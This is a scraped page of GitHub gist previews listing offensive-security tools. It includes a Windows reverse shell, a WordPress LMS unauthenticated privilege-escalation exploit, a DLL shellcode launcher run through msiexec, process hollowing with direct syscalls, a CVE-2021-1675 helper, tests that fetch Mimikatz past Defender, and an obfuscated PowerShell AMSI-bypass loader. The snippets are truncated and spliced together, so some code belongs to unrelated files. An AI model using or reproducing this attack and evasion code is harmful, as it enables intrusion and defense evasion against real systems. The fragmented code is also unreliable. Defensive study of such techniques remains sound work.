dr4k0nia / HInvokeHashGen.cs
Created May 22, 2023 18:43
Tool to generate Hashes for HInvoke
using System;
using System.Collections;
using System.Collections.Generic;
using System.Linq;
using System.Linq.Expressions;
using System.Reflection;
using System.Text;
// Example call: derive the HInvoke hash for the fully-qualified type name and
// method name of Assembly.Load. NOTE(review): GetMethodHash is defined elsewhere
// in this gist (not shown in this preview); presumably the resulting hash is
// what HInvoke uses to resolve the method at runtime instead of its plain
// string name — confirm against the HInvoke implementation.
GetMethodHash("System.Reflection.Assembly", "Load");
loneicewolf / compact_windows_reverse_shell.c
Last active June 3, 2024 12:24
A compact windows reverse shell written in the C Programming Language.
/*
 * code inspired by and modified from DEF CON 25 material, MS Docs and StackOverflow
 * build (cross-compile from Linux): i686-w64-mingw32-gcc -o win_rsh win_rsh.c -lws2_32
 */
#include <ws2tcpip.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32")
int main(int argc, char *argv[]){
WSADATA wsaData;
MapImg = MemAllocateStomped( &fTable, ImgLen );
if ( !MapImg ) {
sParam.ImgMod = TRUE;
MapImg = MemAllocateVirtual( &fTable, ImgLen );
};
InlineZeroMemory( MapImg, ImgLen );
SecHdr = IMAGE_FIRST_SECTION( NtsHdr );
for ( INT i = 0 ; i < NtsHdr->FileHeader.NumberOfSections ; ++i ) {
numanturle / Exploit.js
Created January 30, 2022 10:51
MasterStudy LMS – WordPress LMS Plugin 2.7.5 - Privilege Escalation (Unauthenticated)
// Returns a uniformly distributed integer in the inclusive range [min, max].
// Uses Math.random(), which is NOT a cryptographic RNG; in this PoC it only
// serves to make the throwaway test username/password unique between runs,
// so no security property depends on it.
function randomInt(min, max) {
    const span = max - min + 1;
    return min + Math.floor(Math.random() * span);
}
jQuery(document).ready(function($){
username = "poctesting"+randomInt(1,1337);
password_poc = "S3cr3t"+randomInt(1,1337);
nonce = stm_lms_nonces.stm_lms_register
post_data = {
mgeeky / How to use a function pointer in VBA.md
Created October 22, 2021 09:16 — forked from sancarn/How to use a function pointer in VBA.md
How to use a function pointer in VBA by Akihito Yamashiro

VB6 and VBA come with no support for function pointers.

Also, when you call a function in a DLL through a Declare statement, you can only call functions that use the stdcall calling convention.

These constraints can be avoided by using the DispCallFunc API. DispCallFunc is widely used in VB6, for example when clearing the IE history. Although DispCallFunc is known as an API for invoking methods on an IUnknown-based interface, it can also call ordinary non-COM functions when NULL is passed as its first argument (the instance pointer).

As explained in the MSDN documentation (http://msdn.microsoft.com/en-us/library/ms221473(v=vs.85).aspx), the DispCallFunc arguments are as follows.

mgeeky / wdfilter-tests.ps1
Last active November 19, 2021 23:12
WdFilter.ps1 tests - script accompanying my tweet: https://twitter.com/mariuszbit/status/1450479981855969281
#
# Script that (loosely) demonstrates that processes with certain specific names
# can download Mimikatz unobstructed.
#
# Tweet related:
# https://twitter.com/mariuszbit/status/1450479981855969281
#
$code = @'
class Program
aniqfakhrul / dlllauncher.cs
Created July 7, 2021 04:21
DLL Shellcode Launcher with MSBuild export
// Execute with msiexec; the /z switch loads the given module and calls its
// DllUnregisterServer export (per Microsoft's msiexec documentation), so the
// launcher must export that function:
// msiexec.exe /z C:\Users\ch4rm\Desktop\ObfuscatorXOR\Dlllauncher\bin\x64\Release\Dlllauncher.dll
using System;
using RGiesecke.DllExport;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.Text;
using System.Security.Cryptography;
using System.IO;
hlldz / cve_2021_1675_lpe_dll_finder.cpp
Last active January 26, 2022 12:39
DLL Path Finder for CVE-2021-1675 (LPE)
// Returns the path of the printer-driver DLL; use that value in the exploit.
// Example return value: C:\WINDOWS\System32\DriverStore\FileRepository\ntprint.inf_amd64_xxxxxxxxxxxxxxxx\Amd64\UNIDRV.DLL
wchar_t* findDLLPath() {
wchar_t targetDLLPath[MAX_PATH] = { 0 };
DWORD dwNeeded;
LPBYTE lpDriverInfo;
DWORD dwReturned;
aniqfakhrul / hollow_sc.cpp
Created June 24, 2021 08:24
Process Hollowing + Direct Syscalls
#include <iostream>
#include <Windows.h>
#include <TlHelp32.h>
#include <vector>
#include "aes.hpp"
#include "base64.h"
#include "low.h"
#include <string>
#include <map>
#include <sstream>
aniqfakhrul / reflective.ps1
Created May 28, 2021 09:09
Load .NET Code Reflectively + AMSI Scan Buffer Bypass
[SySTEM.TexT.EnCODING]::uNIcodE.getStriNG([sYsTEM.conVErt]::fROmBAsE64stRINg("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